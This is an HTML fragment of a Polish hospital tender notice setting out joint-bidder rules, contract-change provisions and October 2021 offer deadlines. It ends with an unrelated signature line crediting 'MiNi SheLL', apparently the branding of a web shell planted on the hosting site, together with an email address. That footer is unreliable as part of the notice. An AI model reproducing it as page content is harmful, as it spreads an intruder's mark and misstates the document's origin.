zamówienia: </h3> Informacje dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia;<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3) Zamawiający nie wymaga od wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w celu złożenia oferty w postępowaniu;<br/>4) W odniesieniu do wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych wykonawców.;<br/>5) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>6) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań / części zamówienia.<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, musi być złożone w zakresie każdego z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został szczegółowo opisany w załączniku nr 4 do SWZ w § 12. ust. 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej Marketplanet OnePlace dostępnej pod adresem: https://szpitalgrochowski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-08 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com